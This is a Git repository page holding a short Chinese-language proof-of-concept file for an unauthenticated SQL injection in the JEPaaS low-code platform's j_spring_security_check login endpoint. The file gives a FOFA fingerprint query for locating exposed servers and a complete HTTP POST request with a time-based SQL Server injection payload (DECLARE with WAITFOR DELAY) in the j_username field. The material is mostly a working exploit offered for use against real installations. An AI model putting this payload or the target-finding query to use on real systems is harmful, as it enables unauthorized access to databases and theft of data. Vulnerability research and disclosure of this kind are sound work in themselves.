admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity
wy876_POC/JEPaaS低代码平台j_spring_security_check存在SQL注入漏洞.md
wy876 1d29022cc3 6.14更新漏洞
2024-06-14 21:32:30 +08:00

20 lines
618 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## JEPaaS低代码平台j_spring_security_check存在SQL注入漏洞
JEPaaS低代码平台j_spring_security_check存在SQL注入漏洞未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息。
## fofa
```
body="/saas/saasYhAction!sendRandom.action"
```
## poc
```
POST /j_spring_security_check HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
j_username=');DECLARE @x CHAR(9);SET @x=0x303a303a35;WAITFOR DELAY @x--
```
Reference in New Issue View Git Blame Copy Permalink